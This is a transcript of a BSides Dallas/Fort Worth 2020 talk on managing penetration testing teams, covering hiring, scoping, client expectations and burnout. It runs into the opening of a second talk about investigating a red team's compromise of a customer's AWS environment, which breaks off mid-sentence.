← All talks

Managing Misfits: Lessons Learned from a Decade of Leading Penetration Testing Teams

BSides Dallas/Fort Worth · 20206:27:25144 viewsPublished 2020-11Watch on YouTube ↗
Speakers
Tags
CategoryCareer
TeamRed
StyleTalk
Mentioned in this talk
Show transcript [en]

Welcome everyone to Managing Misfits, Lessons Learned from a Decade of Leading Penetration Testing Teams, or our original working title, Managing Misfits, An Epic Meme Adventure. Let's dive right in. The things we wanted to talk about today, first, Chrissy and I will give a quick intro of who we are and how we got here. We'll talk a bit about building a penetration testing team for success.

We'll talk about some of the epic battles that you might have with the business, and that could be your clients if you're in consulting or your business partners if you're an industry tester or a red teamer for a large organization. Next, we'll talk about managing misfits or managing a team. And last, we'll open it up for some questions. So let's jump right in, Chrissy, with your intro.

Thank you, Nick. Thank you everyone for being here. It's a privilege to be able to speak to you all and share with you some of our insights that we've got here. So a little bit about me. My name is Chrissy Safi. I am a managing director and I'm also the global practice leader for our attack and penetration testing practice at Pritivity. I live currently in the Denver area and some of my hobbies include things that you find here commonly in Colorado. We really enjoy camping, hiking, adventuring. I love to travel. I love food. I went to culinary school, so I like to call myself a chef. I also find myself momming from time to time. I've got a three-year-old and a four-year-old.

And then I'm married to a really great supportive husband who is totally on board with my obsession with various gadgets. It's fun. So how I got here. So I have had kind of an interesting journey, kind of not your traditional journey in the cybersecurity space. I've been in the industry for about almost two decades now, and I really did start my journey as a hacker. So when I describe to people kind of how I got to where I am, it dates back to when I was a kid. So I'm most famous for circumventing rules of my parents. However, I did it always as stealthy as I could. I didn't want to get caught. I thought their rules were dumb anyway, but the

punishments were pretty bad. So, you know, whether it was figuring out how to make long distance phone calls for free or how to stay up on the internet all night long without America Online charging us, things like that, but I never really thought about how that could morph into a career. So fast forward a few years, I went to the University of Colorado at Boulder. I started my college career as a math major, then became a biology major, And that was hard. I somehow stumbled into a pen testing internship with IBM, however, and they promised me that if I had an undergrad degree in anything I wanted, they would hire me. And so naturally, I got my degree in Italian. I did study abroad in Italy

and I spoke a little Italian just for the fun of it, but it was my quickest way out of school. And IBM held up their end of the commitment there and they hired me. I started as a pen tester. I'm working on various client engagements, doing a lot of internal penetration testing. Overall, I spent about 10 years during that period of time with IBM in various cybersecurity roles. So, became a security advisor for major Fortune 50, Fortune 100 companies that had outsourced their security. I was an offering manager. I did a lot of different things and then somewhere along the way I decided I needed a change of scenery from Colorado and so I moved to Washington DC. I got my MBA

at the University of Maryland. That's when I went to culinary school shortly after that and then I think it's a rite of passage when you live in the DC area that you have to work for the government for at least part of the time. So I went down that path and I got a job with the US government I traveled the world for a few years doing infrastructure security at embassies, probably one of the coolest jobs I've ever had. But then I was recruited back to IBM Security to help launch what is now known today as IBM X-Force Red. So that was a few years in the making. I wore a lot of different hats from being the offering manager to routes market leader and left that position

running the Americas and Japan for them. And then in April, I was recruited to productivity to become the global practice leader for the penetration testing practice. And so here we are. Yeah, in the future, I'm gonna have to go first because my story isn't nearly as cool as that, but I'll try my best. So again, like, Great to meet everyone virtually. What a weird situation to be in, having to be kind of at home and virtual, but I'm glad we could still have the conference. This is great. So a bit about me. My name is Nick Britton. I'm an associate director at ProTivity. First and foremost, I'm a proud Texan. Despite growing up in a military family where I moved every two to three years

and kind of found myself in a lot of weird places, we always found a way back to Texas. And I've been here since really high school. And now it's absolutely 100% home for me. I like to describe myself as the world's OK-est penetration tester. That is my background. I was a penetration tester by trade for a number of years, and I lead the team. But as I've grown in my career, I've realized that compared to the people that we have on the team now, I'm certainly just one of the OK-est. I am not the best, and I've got so much to learn despite leading that team. And one of the things I am exceptional at, however, is, is just buying stuff on Amazon. So, you know, while pen

testing is, you know, there's a lot of room to grow there. Amazon, I've got figured out. So if you need tips on that, certainly let me know. A bit about how I got here. So similar to Chrissy, my, sorry, my career in pen testing or kind of that, that whole mindset really started early as well. I was a professional, quote unquote, gamer in high school. The e-sports world didn't really exist back then. So I put professional in quotes because I just found a few online retailers that would give me free stuff or free swag for putting their company name in my handle on Counter-Strike. But it really was that type of thing that got me

interested in building my own computers, spending a lot of time on IRC, finding games, things like that. And that really led to spending a lot of time

looking at how to hack games and how to hack different things because you're in that kind of culture. And it's really when I started to fall in love with the security community and just the computer community in general. I ended up going to Baylor for undergrad and I ended up in the business school somehow and found myself at Protivity right out of school. And I actually spent a few years as a project manager and realized that that was absolutely not what I wanted to do. I respect great project managers. It's a hell of a trade, but for me, I wanted to be down in the weeds in the technology of security. And that really started when I attended B-Sides Las Vegas for the first time. And I just

fell in love with the community and realized that pen testing was my passion and something I wanted to do. And I was really fortunate that Protivity kind of gambled on me, gave me the opportunity to jump into the pen testing space. And I was absolutely carried through the first few years of offensive security by the people around me on my team, by the community, by everyone that publishes open source tools and open source articles. I had no idea what I was doing starting out and I was just absolutely carried through it. Since that time, I've developed a pen testing practice for ProTivity in Dallas and we've built an absolutely amazing team that we'll kind of

talk about as we go here. And my role has really transitioned now out of just thinking about Dallas and really thinking globally with Chrissy and I'm now the practice development lead for ATT&P ProTivity. And I'm super excited at the rate we're growing and I'm excited to talk about kind of the techniques that we've used to grow the team and how you might be able to leverage some of those yourself.

Awesome, thanks, Nick. Alright, so enough about us. Let's just jump in and get to the part that you really want to hear about. So this next section that we're going to go through focuses on building out a team. And I'm going to specifically talk about hiring and kind of the structure of the team that we've built. Alright, so how to conduct a meaningful interview. So let me just start by saying this, I do not have the technical chops to go toe to toe with the very technical candidates or the recruits that we're going after. But I've got a whole team of people that can do that and we've built the trust and that structure there, but I let them run with

that part. And I really focus more on the emotional intelligence aspects of the candidates. So really, who is the person, what are their behaviors, things like that. I usually gear my questions around things like, you know, could I see myself working with this person? Would others want to work with this person, others on my team? Will this person be a culture add to our team? And I don't mean just a culture fit, you hear that often, but I'm looking for adds. So, you know, what are their extracurriculars? What are their interests and their passions and their backgrounds? What kind of diverse perspectives can they add to our culture to make us even better?

What is the person's emotional quotient? So what's their EQ score? What does that look like? So I look at things like, you know, how do they present themselves both verbally and physically during the interview? So, you know, are they on time? Are they dressed appropriately? How do they articulate their thoughts? Are they self-aware? Are they prepared for the interview? Things like that. I also like to leave time at the end of an interview for questions. I like to kind of hear, you know, what are they thinking? How does what I'm saying resonate? And, you know, one of the things I keep in mind too is, you know, how are the questions that I'm asking of them received by them? So, for example, you know,

asking a simple question, you know, like what side projects are you working on? You know, that could be interpreted as, you know, maybe this person is trying to get insight into what my life circumstances are, when really in fact all I'm trying to figure out is, you know, what are your passions? What are your interests? So like another way that we look at phrasing something like this is, you know, if you had 20% of your time at work to dedicate to a project of your choosing, what would it be? And I think that really gets to, you know, the pieces of information that I'm looking for to see if this person is gonna be a

good fit or not. So next I just wanna share with you some insights into, you know, what I look for and what I look for. what I avoid when hiring as well. So, you know, you can look at the list here, kind of things I call winning and the red flag. A lot of them are really obvious, right? You know, so having that confidence, being prepared for the interview, being enthusiastic, things like that. But there are a few that I do want to point out that maybe you haven't thought about. And, you know, we see some of these traps sometimes and, you know, take note of some of these and consider them for the next interview that

you might be going through. Maybe it'll be with me. So what I look for is OSINT, so Open Source Intelligence Gathering. What has the candidate done to research the company research the job, research the team, research me. That helps show that there's an interest and an understanding. They didn't just get caught up in the title of the job post, for example. Ooh, it says pen tester, this will be great. Really digging in and trying to get an understanding of the business that the potential employer is in and the team that you'd be working for. I touched on asking questions. I love seeing questions, so as you're engaged. Honesty, you'll see that as a theme actually throughout this presentation. We value honesty here in

my team and at Pertivity. Have ideas, and notice that I didn't say has good ideas. I like ideas, any ideas. We can work with these things that shows that somebody's thinking and maybe it morphs into something else that becomes some sort of really great idea that we spin up a new new thing, a new tool, a new offering, I don't know. I also like disruptors. Now, I put in parentheses there with tact. Okay, I like disruptors that want to challenge the status quo, but do it in a tactful and respectful way. I hate hearing, you know, well this is just how we've always done it, or this is the way I've always done it, the best way to do it, and like kind of

being closed-minded from listening to new ideas and things like that. So, From a red flag perspective, again, a lot of obvious things here, but some of the traps that I've seen is kind of this victim mentality, if you will. So, you know, kind of blaming everything on somebody else or my previous boss hated me or my old company was out to get me or I was ignored for promotions, those kinds of things. Like, I like to see people that really take ownership and even take ownership for their mistakes. Kind of goes back to the honesty aspect. I don't really like to hear the gossip about previous bosses or employers or colleagues, things like that. Kind of sends a message of, you know, if this doesn't work out,

are you going to go do that to us as well? Yeah, those I think are the highlights there. And yeah, just keep these things in mind. They really do help during the interview process, especially when you're interviewing with kind of a leader of the practice versus somebody from a technical perspective. So next I wanna get into team structure a little bit. So when I think about building out a team and kind of what I've done here at Portivity and in the past is focusing on things like depth and breadth, okay? And I don't mean just depth and breadth of skills. I mean things like diversity, diversity of the people, of the backgrounds, of people's aspirations, of people's interests, things like

that. And I like to make sure that it is visible to my team what opportunities are available for growth. A lot of people have different things that motivate them, they have different aspirations in their career. So making that known. So maybe they wanna pursue a technical track, maybe they want to get into leadership or in business development, project management. I guess Nick's not gonna be into the project management route, but operations. So I really subscribe to the model of you gotta see it to be it. So I make sure that these kinds of opportunities are known. And then from an engagement perspective, the teaming structure, we do a lot of deliberate pairing of testers on our projects. So we try to run with at least two

people on a test of varying skill sets. Some are specialized, unique skill sets. Some are maybe folks newer to the practice, and we use it as an opportunity to really do a lot of cross collaboration and cross training. I do believe in scaling up our internal team versus, you know, just recruiting from outside to fill a specific gap if it's possible. And then the question that, you know, I think we're all debating right now, you know, remote to be or not to be. I've actually worked most of my career remotely. So I have a lot of very pro remote, things to say, and I think it can be done successfully. It comes from an environment of being on site, and that certainly has its pros and such. And COVID

is really kind of testing how we can all operate in a productive and collaborative way. So a lot more to say on that. When we get to the Q&A piece, if anyone has questions or specific insights around that, I'm always happy to answer that. Yeah. You're absolutely right, Chrissy. And COVID's tested my, you know, kind of theory that you have to be on site. And I know you laugh because you heard it right when you started. And, you know, I love being on site, but there's so much you can do now virtually. And I'm learning that you don't necessarily have to be face-to-face with somebody to learn from them and teach them and, you know, be successful. So it's been an

interesting year. So next, we're going to jump into our next section, which is battling the business. So some common challenges and issues facing teams pre-engagement as well as during the engagement. And ideally, right, we say battling the business, but ideally in a perfect world, it's the SpongeBob-Rainbow partnership, right? It's a pen test is wanted by the client or the organization that you're hitting. They want your findings. They're receptive to it. The scope is whatever you want it to be. Everything goes well. And it's just amazing. But in reality, right, that's not probably it. And I feel like this sums up the majority of my day. I'm having difficult client conversations because they don't like the way the findings are positioned. The scope isn't what

we want. The budget, there's so many things. And of course, during those conversations, I'm nice, SpongeBob. But I have to kind of stew over those things because I would love it to be perfect. And then, of course, when I describe the conversations to my wife, I'm Hulk SpongeBob and portray it as if I just told them exactly how it was going to be. But that's never actually the case. And so there's really three things that we think of and three battles that we fight. And I wanted to give you some tips on how at least Chrissy and I and we even handle these differently sometimes, how we handle the battles that we go through day

in and day out. And first is foundational, it's fundamental, it's scope. And you're probably rolling your eyes already at home because this is something everyone has to deal with always. Scoping assessments is so important and it's getting harder because pen testing is becoming more commoditized. Every day you're hearing about some artificial intelligence or some machine learning program that's going to automate all of the pen testing jobs. And you're just going to click a button and it's going to run a red team, quote unquote, scan, right? Well, we all know that's not the case. Like there has to be a human element because there's a human element on the other side, right? So you have to be able to talk through that with your

clients during the scoping process to ensure that you're on the same page. And that's where we'll start, right? Ensure you're speaking the same language. So the first thing I do with a client is I make them, if it's the first time we've talked, define pen testing to me, if that's what they're asking for. And I say, I know what I think pen testing is, but what does it mean to you? Do you see it as automated scanning, a vulnerability scan? Do you see it as threat emulation? Like where in kind of the maturity level do you see it? And what do you really want? And once you get that... understanding of what they're actually looking for, you can start actually building out the test and

the program that they're looking for without even worrying about the language and what you're calling things. Next is not everyone needs a Cadillac. This was really tough for me as I transitioned from a pen testing role where all I wanted to do was deep multi-month red team engagements into leadership where I was having conversations with clients and scoping engagements. If you're a hammer, everything looks like a nail, right? So I wanted to do red team assessments. So all I told clients they should do was red team assessments. Well, small businesses, businesses that aren't necessarily in a secure posture yet, they don't need a full red team assessment. Some of them just need a VA scan. Some of them just need

a basic net pen to identify some of the low hanging fruit so that they can build their posture. and eventually get to a more mature state. And that was tough for me for a long time, but you gotta remember, some people don't need that Cadillac red team with physical social engineering and the works, right? And I think that goes kind of really well with my last point here is you gotta work through scope restrictions. And we could probably have a whole talk on scope restrictions, right? I'm sure there's memes and gifts galore on Reddit about scope restrictions and pen testing, You know, this happens all the time, but you have to be somewhat understanding of the position that you're putting the business in. It's not always your

point of contact's decision on what the scope can be. You know, we are here to support the business and there will be times when, you know, that system that they know is vulnerable is going to be out of scope. Not everything needs to be a red team. Not everything needs to be in scope every time. Sometimes it goes back to understanding what they need to make sure that you can, you know, still give them a good test without just, kind of barreling through the scope and making the claim that if not everything's in scope, it's not a real test. Maybe an unpopular opinion, but I'll say it. So battle number two is all about expectations. So you've scoped your assessment, you are already

started and you're proactively managing expectations with the client by defining scope, ensuring you're on the same page, you're using the same lingo, you have a common understanding. But now you need to chan and apparently Chrissy's never seen this meme tour. So for anyo seen any movies for the last 10 y Noah is getting back with his w wants and he's just continuously saying, what do you want? What do you want? Kind of berating her with it. So probably don't do that to your business partners. But I think it's imp to continuously ask through the process what they're looking for out of the test. And it can be hard to drag out of some people like,

what are your actual goals and objectives with this pen test? Is it just to check a box? Is it to get more security budget? Is it to test some changes that you've made to your network? Keep asking until you get to the real problem of why they're having a pen test or why they're asking for a pen test. Because you can start to get some really great information that can really drive the way you approach the test and drive the approach you use. And sometimes it takes a few times going through it for someone to really understand why they want a pen test. Sometimes it's a battle for them as well.

Oh yes, battle number three. So when it all goes wrong, Kermit says, oh no. So this is taboo to talk about, right? This is the thing that no one wants to say. It's uncomfortable for me to talk about because I think we all just pretend it doesn't happen. But in reality, like I said, this is a human-centric practice. So pen testing is not artificial intelligence that just does everything right every time. It's human-centric and it has to be. And so with that, things will inevitably go wrong sometimes. So first, we're doing something that's inherently risky and we're targeting things on a network that's that is typically in production. And eventually, if you do this for long enough, you or one

of your testers is going to break something. For example, maybe a bank mobile app that controls mobile banking. Just an example. And it's really important to tell your testers and instill a culture in your organization, not to encourage that, but that it's okay that these things happen from time to time. A, because you want your testers to be able to come to you and tell you immediately if something's happened and not be scared of ramifications. If you scare your testers or if you're scared to tell someone, you're either going to try to sweep it under the rug and it's going to get caught anyway. You're going to be in a terrible position. Or, and I think even worse, your testers are going

to be scared to do things that are risky. And they're going to be scared to push the envelope. and try new attack techniques. And we have to manage that. But at the end of the day, I tell my guys and girls, the relationship we should have is you should come to me with crazy ideas that you wanna execute on a network or on an application. And it's my job to manage the risk, but I want you to be brainstorming and thinking of new things and pushing kind of the boundaries of what we can do. And I think it's important to have that relationship and have that culture in a team because you want the team

to constantly expand their skillsets. And the second thing that goes wrong, you know, you're going to have clients that say, you know, you missed something, you did something a year ago, and you didn't catch this. And I think it's important that we start talking about this more openly as a, you know, really as an industry and as a community that, you know, it's not a silver bullet. Pen testing is human centric, it's a point in time assessment. And there's a lot of things, a lot of variables in any test, and you are not going to find every single vulnerability on any test. And I think it's taboo to say that to a client or to

a business partner. And so they have this maybe expectation that you're finding every single thing. And Chrissy mentioned it earlier, we need to be honest about what clients are getting and tell them, we have these capabilities, here's what our team does, maybe write the narrative of all the things you tried. But at the end of the day, there's limitless possibilities of ways to attack your network or your application. So there's always the possibility that there's more out there. That's why it's important to build a program around testing and not just have one a year, one every five years, or whatever it might be. So we'll wrap up a little bit on the battles we have with the business, and we'll

switch to our namesake, managing misfits. And spoiler alert, we're all misfits here. I think you kind of have to be to be in security. It comes with a certain mindset, and it's what makes us successful. And so we'll talk a little bit about embracing that as we go. I looked up the definition and I only stole part of it because after this part, it gets kind of unflattering, but this is the part I decided to focus on because I think this is what really matters to me. You know, a misfit is a person whose behavior or attitude sets them apart from others. And I think that's exactly right, especially in pen testing. So if you look at our team and me and Chrissy, you know, I

think we do have a different attitude or mindset than most. And I think it's the curiosity and the competition that makes us successful in the things that we do and makes us so good at security. We're always kind of poking and prodding at different things, whether it's trying to get three long distance calls or hack Counter-Strike for better gaming purposes. So with a team of misfits is going to come a lot of unique personalities, and that might be an understatement. And I kind of put this statistic together. And my thought is people management is 40% organization, 30% leadership, 15% preparation, and like 80 to 90% awkward conversations. And if you're in leadership, you probably have a giant smile

right now. If you're not yet and you want to get into leadership, be prepared. When I got into management, I was not. And I was flabbergasted by the number of awkward conversations that I had to have on a daily basis. and you get better at it. But it's, I don't think something you can really prepare for. You're gonna be leading a team, you're gonna have to have conversations that are going to be weird about performance, about other people's careers, about their goals and aspirations in life, about their feelings, about hiring and firing decisions. And it is awkward, but you have to be willing to embrace that if you ignore those things. you will not be a successful leader and your team will not be successful as a

group because they'll feel like they have to kind of hold all that in. And so open and honest communication, even awkward communication is essential, especially in something like pen testing where there's so many variables and so much going on. And I stole a quote from General McChrystal. If you don't know him, you should look him up. Absolutely amazing leader. He has some great YouTube videos, but he mentioned great leaders can let you fail. yet not let you be a failure. And I think this ties back really well to when things go wrong. So it's important to instill that culture in your team that failing on an individual project is not necessarily a bad thing. And just because you haven't succeeded in a daily

task or a project or something doesn't mean you as a person are a failure. It just means that you drop the ball on something and it's something to learn from, right? So we have to instill that culture to keep everyone driving forward.

And then this is my wonderful Microsoft Paint work. As you can probably tell, it looks very professional. Excuse me. I won't spend a ton of time here. This is something that I've drawn on the whiteboard in my office a number of times for new consultants who talk about kind of what their development plan looks like. And I view it kind of as an hourglass. So I see this kind of broad, You know, we want people to have a lot of experiences as young consultants, and we want people that are getting into the industry, you know, regardless of kind of how they got here, we want them to get a lot of different experiences and exposure

to a lot of different things. People will inevitably come in and tell you exactly what they want to specialize in day one. That's great. You can't tell what you want to specialize in until you've had some of those experiences. And so push your team as they come in and they're new to the industry to get a broad strokes example of all the different things that you offer. And what will happen is as they progress in their career, they will gain expertise in a single area and start to specialize. And then they will eventually broaden back out potentially or not. Maybe they'll stay that expert in a specific area. But a lot of people kind of broaden back out. And that's kind of where Chrissy and I

are at. is kind of getting out of the way of the people that have super specific expertise below us and letting them do their jobs.

Exactly. Thanks, Nick. And then something, no matter where you are in that version there, something we're all dealing with right now is burnout. So I want to talk about that for a minute. But first, some statistics, because I really do like numbers. In a recent survey, 63% of organizations are experiencing a shortage of IT staff dedicated to cybersecurity. I know you all know that, and that is a very big number. And we are all working towards closing that gap with cybersecurity. You know, cyber security skills and things like that. I feel very fortunate to work for productivity, which is a subsidiary of Robert half. We have the ability to reach in to Robert half to help

fill some of these needs so that we can avoid some of the burnout that even our client staff is feeling right now, especially.

57% of workers in the tech industry are currently suffering from burnout. So you're not alone. 65% of SOC professionals say stress has caused them to think about quitting. 91%, this just seemed really high to me, of CISOs say they suffer from moderate or high stress. Might need to rethink my own career path. I kind of always thought I wanted to be a CISO, but 97% suffer from stress. But yeah, I mean, we're all feeling it right now, especially with the times that we're in with COVID, with politics, the social inequality issues that we're hearing about every day, the natural disasters. You know, here in Colorado, we've been battling fires this summer. So there's just a

lot going on. It all contributes to that stress and kind of that overall burnout. So again, you're not alone, but you know, really, how do you avoid it?

I don't know. Just kidding. I mean, but really, like, I really do wish that there was a silver bullet for this. You know, what I've learned through the years is that, you know, different things work for different people. Some people are good at things like setting boundaries and sticking to it, taking vacation. Some people aren't as good at it. Specifically, Nick, he's pretty terrible at it. I'm not sure when he actually even sleeps. But I try as a leader to really reinforce that, you know, we need to take that time. We need to set some boundaries. And I personally set boundaries and I communicate those things with my team and with my leadership. And I try to set an example of that's

okay. It's okay to say that, you know, for me between 530 and eight is when I spend time with my family. That's when we make dinner. That's when we, you know, bathe children, read stories. They go to bed at eight. And then after that is kind of, a free for all. It's either time for me to get some self-care or maybe my husband and I will watch a show or just catch up on the day or plans for the weekend. But between the hours of 530 and 8, I'm really pretty good about sticking to not looking at my phone, not looking at my emails, things like that, because that is kind of the only time

that I really get to kind of disconnect from the craziness that is cybersecurity and the world that we're all in. So again, there's not a magic bullet, but this is my advice. Just try to set those boundaries, communicate your needs, disconnect when you can. Even though I say really just do it, it's hard to do. And for me too, like when I go on vacation, I do take vacation. I'm really good at it actually. I make sure for my own stress levels that I check in periodically, like every day or two, just open up the email, just see if there's any fires burning and if there's any kind of escalations or things like that. But I've also built a really strong team

under me. And so I can trust they can handle things. But for me, it helps just to check that email because then I don't come back to a pile of mail and have that thought of no good vacation goes unpunished. A lot of companies have wellness programs available. You know, I've seen some cool things around exercise platforms, mindfulness sessions. I've recently been seeing some guides for healthier meal planning and things like that. So the list goes on. But again, different things for different people. It's easier said than done to really take that time. Now there are some things that your company can do, and these are things that I instill within my practice and Creativity certainly does as a company, is things like

genuinely supporting the needs of the people. So being flexible with work schedules. So, you know, some of the things that we're doing is, you know, we've got parents in our organization that are now teachers and homeschooling their kids. And so if they need to shift their work schedule, because between 10 and 12, they have to teach math, then that's a time when we're not going to have meetings. And our clients are respecting that as well to be able to shift those meetings to a different time to support those parents. that are in those test positions. We also try to do no video Fridays, because now with everybody being remote, I swear we all used to be fine with the phone and just talking via audio, and suddenly there's

this influx of everyone needs to be on video, and we all have Zoom fatigue and so on. So setting aside Fridays or whatever time is okay to not get on video. Go take a walk while you're on this call. We also do different types of recognition and training, realizing the different things motivate people differently, try to get out of that whack-a-mole mode, try to not always be like that knee-jerk reaction to everything, quick, quick, everything's a crisis. Let's get a strategy and a plan together so that we can avoid that burnout as much as possible. We're also looking at different technologies that we can reduce, that we can implement to reduce workloads. So different automation techniques, you know, free up some time

for our people to focus on, you know, kind of the more interesting things and get away from some of the mundane tasks. So I wish I had the answer and the silver bullet, but hopefully some of these suggestions will help you and help your company as well as we kind of all get through this crazy time. All right. So, Hope you feel so much smarter and wiser. You're ready to go start your own pen testing practice. Really just some of the key takeaways we want to leave you guys with, you know, things that kind of resonate and bubble to the top for us is really the big priorities here. You know, when you're hiring, hire for potential. Don't just look

at current skill sets. You know, you can upskill people if they have the right attitude and the right passion and things like that. We need that diversity and that diverse background that sometimes you can only get when you look at people from that perspective. The team structure, it's critical. It's critical for employee engagement, for people to be able to see their future potentially, what leadership roles or what technical roles or other roles that they could potentially move into. It really helps people to stay engaged and be productive and contributing to the team and themselves and the organization. communication is key, key to manage all the things, whether it's communicating, you know, the expectations with your clients, with testers, with others in your organization, even about,

you know, any special, like, flexible work schedules you might need. Really, communication is key. And embrace the inner and outer misfit. We love you all, and we, I love this space, personally. I love you know, the personalities and the mindset that this particular space and in cybersecurity in general brings and just want to give everybody a big virtual hug. And then again, yeah, no silver bullet for avoiding burnout. Sorry. But thank you for being here. We really appreciate your time and over to you, Nick. Yeah, thanks, Chrissy. No, I mean, I agree. Thank everyone for joining and we're asynchronous now. So I believe we're gonna have a forum for questions, but if not, feel free to reach out to Chrissy or myself on Twitter, LinkedIn, kind of anywhere you

can find us and we're happy to chat. We look forward to talking to everybody. Thanks. Thank you.

All right, hello everyone. And welcome to my talk, Chasing a Red Team from the Dressing Room into the Cloud. My name's Tyler Fornes. I'm a Principal Detection and Response Analyst at Expel, which is a managed securities provider. We cover a lot of different technologies and a lot of different things, but we're going to talk about that later. What I really want to share with you guys today is kind of an interesting investigation that we did involving AWS specifically, where we chased a red team, literally, yes, from the dressing room all the way into our customers' AWS Cloud. A little bit about myself before we jump into the technical details. Being a principal detection response analyst

at Expel, I get to see a lot of really cool incidents and investigations all the way from the enterprise, kind of your traditional EDR, MSSP kind of style alerting to a lot of really cool stuff that we actually see in AWS, GCP, and Azure. I lead our global response team, which is kind of the team that comes in at the end when we have a critical incident where we're going to be running down active attackers, performing live mediation actions, live resilience actions, and doing a lot of the technical work that kind of tells us the who, what, where, when, why of a breach. Before I jumped into Expel about three years ago, I worked at Mandiant FireEye where I spent a little bit of time there running

down targeted activity as well as doing a lot of network and Windows-based incident response, which was a lot of fun. But enough about me. What we're going to talk about today is really kind of a few things I want you to take away from this presentation. We're going to talk a lot about AWS, a lot about what attackers do in AWS, but I really want to share with you our investigative process of how we actually respond to something from a blue team perspective in the cloud. And really on the flip side of that, talking about some of the tools and stuff like that is really cool, but what I really want to talk about is

how attackers abuse AWS. A lot of people are moving into the cloud, a lot of people are making a transition from on-prem infrastructure to all of these big scary acronyms that exist across all three big cloud providers. But I really want to talk about what an attacker sees when they see some of these services running and kind of how they're thinking about using them to get inside your environment. And last but not least, this is a really cool red versus blue team engagement, which really kind of highlights the importance of purple team, which I know is one of those acronyms or one of those words that floats around our industry a lot. But I really

think that this is a good example of what it looks like when a red and a blue team work together for the common goal of making a customer more secure. And I think that's really powerful. Now, some background about what I mean when I talk about full cloud compromise. Full cloud compromise looks like this. And what you're seeing here is actually a diagram I made of the entire engagement that the red team actually went through to compromise this customer. You'll see that it's all not in AWS. There were some aspects of this investigation, specifically in the initial access phase, where the customer actually had to go to a storefront to be able to get their

way to the cloud. And I think that's really powerful because when we think about how to protect the cloud, we usually think about a lot of those border things that are kind of the gatekeepers of the cloud, meaning API endpoints, console access, and things like that. But what happens when an attacker makes it into another part of your environment and uses those things and the reconnaissance that they gain from being on your systems against you to get in from the inside. And that's really to me what full cloud compromise looks like. It's not just someone going out on a GitHub page and scraping an API key or having an opportunistic attack where they come across

some access key in your code. It's really being able to use the information that they've gained in a breach against you to not only just get into your AWS infrastructure, but to gain that master control of what they're capable of once they get to that root console access. And we're gonna take a look a bit into a few specific things, but mostly what we're gonna talk about is how an attacker can use the AWS API remotely to get some of this access. what it looks like when they're actually able to delegate their role or escalate their privileges into an AWS console user, meaning they're likely going to have root access or some way of getting to that account. Then we're going to talk about role delegation and impersonation, two-factor

bypass, and we're going to talk about what it looks like when an attacker actually has full control of all these services. And I'm going to share with you some really clever things that the red team did once they had this level of access that was really surprising to us and actually led us to actually creating some really really powerful detections that we've been able to use not only at this customer, but across our entire customer base and even down the road actually being able to contribute some of them back to the MITRE ATT&CK framework, which was really cool. So really what this looks like on the red team side is pretty easy to see. But

what a blue team starts to see when they start detecting compromise might not be as obvious. And as you can see right here, these are sanitized versions of some of the alerts that we started to see when we actually started to detect this breach by the red team at one of our customers. You'll see here I have two alerts, both for suspicious access key generation and suspicious SSH key pair generation. Both of these alerts started coming in around the same time. And really when we started seeing them at face value, they kind of mean one thing. We know that someone's trying to get in, or in the case of the access key generation happening, someone may have already gotten in. But that doesn't really answer all of our investigative

questions that we ask ourselves as blue teamers when we're running down a breach. Really, we want to know the who, what, where, Why? Because if I'm seeing these SSH key pairs being generated against AWS, that means that someone already has been given access and is already in. And that's where the really sexy investigation starts to happen. And I'm going to start to share with you kind of how we cut up CloudTrail and GuardDuty specifically so that we can get the answers to some of these questions really easily and start telling the whole story of the breach. Now, at the end of this, this is actually what our findings report looks like in our tool that

we use to communicate with our customers. You'll see here a lot of this is redacted, but what you're supposed to get away from this slide is there's a lot of stuff that goes into solving this breach, and there's a lot of information and a lot of IOCs that are gleaned. Alerting will get you halfway there, but isn't going to tell the whole story. And it's really what you can do with some of this data that AWS gives you by default, that's going to allow you to generate a findings report where you can tell the entire story of a breach, meaning how did the attacker get in? What did they do once they got in? And

what were the resultant activities of their access that allowed them, you know, kind of what was the goal in which they, you know, actually were trying to get to? Where was the suites that they were trying to unlock, right? And that's really what we're going to get to at the end. And I'll show you some cool things that they ended up doing. So a little bit about what we protect and a little bit about this customer's background before we jump into the story itself. This customer is a major organization. They have a lot of different retail stores, a lot of different headquarters, a lot of different apps that communicate, as well as a lot of

different big warehouses that are around the globe that all communicate with each other over a network. And what this all is backended into is a large AWS cloud instance, meaning everything and anything that this customer does, they've developed to be compliant with AWS. And a lot of the tools and a lot of the things that they use every day and a lot of the things that their customers use are all go back into the cloud and are cloud resonant. So for us, what that means is that we're going to have to use a lot of their tooling to start piecing together what exactly happens if an attacker gets in. Because more than likely, the thing

that an attacker is looking for isn't going to be in the storefront or may not even be at the headquarters or in the warehouse. It's likely going to be at the back end of what is driving this organization, in this case, AWS. And a few of the tools specifically that we're going to use to get there is we're going to use AWS GuardDuty for a lot of our alerting, and we're going to talk specifically about what alerts in GuardDuty are really beneficial and maybe some places where we can augment and make them a little better. But there's also going to be a significant lift on EDR products and network visibility as well. Because if the

attacker starts moving between the cloud and the enterprise or vice versa, we're going to want to be able to tell that story and we're going to want to be able to use those tools in tandem to solve this cloud breach. Now, really, when we start talking about why the customer really hired this red team, it was because they wanted to basically simulate what an advanced adversary would do if they were targeting this customer specifically. Now, that meant that the customer gave this red team full scope. Now, that's really cool because that means that the red team can be creative and they can use a lot of tooling and things that we have maybe never seen

before. That's really good for the customer. And that's really good for us too as a blue team because cloud is new. Cloud is something that only a few people have been doing for more than five years. Especially from the blue team perspective, we really don't have a lot of case studies to study about what an attacker does in the cloud. If we let a lot of really smart technical people go and throw a bunch of exploits and move around however they want in the cloud, we're going to learn a lot about how the cloud works, which is really cool on our end. But that's also scary for a customer because that means that the red

team has the ability to mess with production infrastructure. This customer was comfortable with that because they wanted to know what would actually be useful to an attacker if they got in their environment. Now, the second big thing to take away from this before we start talking about the actual story is we were left in the dark. As their blue team, as their managed security provider, we didn't know that this red team had been hired and we definitely didn't know anything about the scope of the engagement. Meaning this was just picked up in our sock one day. Our analysts spotted this from alerting that we had created for AWS and we started digging in to kind

of see the technical details. Now, full disclosure, we didn't detect all of it and that's okay. We learned a lot from this and that's the point of having a red team in your environment. It isn't to detect all the things, it's to get better. And that's really what I want to highlight in this whole scenario is that we learned a lot from this and I hope you do too. And lastly, you can see at the bottom, I left this snarky comment. Customers love to leave us in the dark, especially during proof of concepts. And this is kind of the, well, we say we can detect a lot of things, but can you really? And we

love that because it's really challenging for us. And it's really cool for us to be able to think outside the box about new detections and ways in which we can augment all of this technology. So we really love this situation. And this is one of those where we actually won this customer over in terms of how we were able to respond and use these tools. Enough about that. Let's jump into the story. So where did this all start? Where this started for us is actually a CrowdStrike alert. So this didn't even start in the cloud. And what I have listed out here on the left-hand side is kind of how we think about doing blue

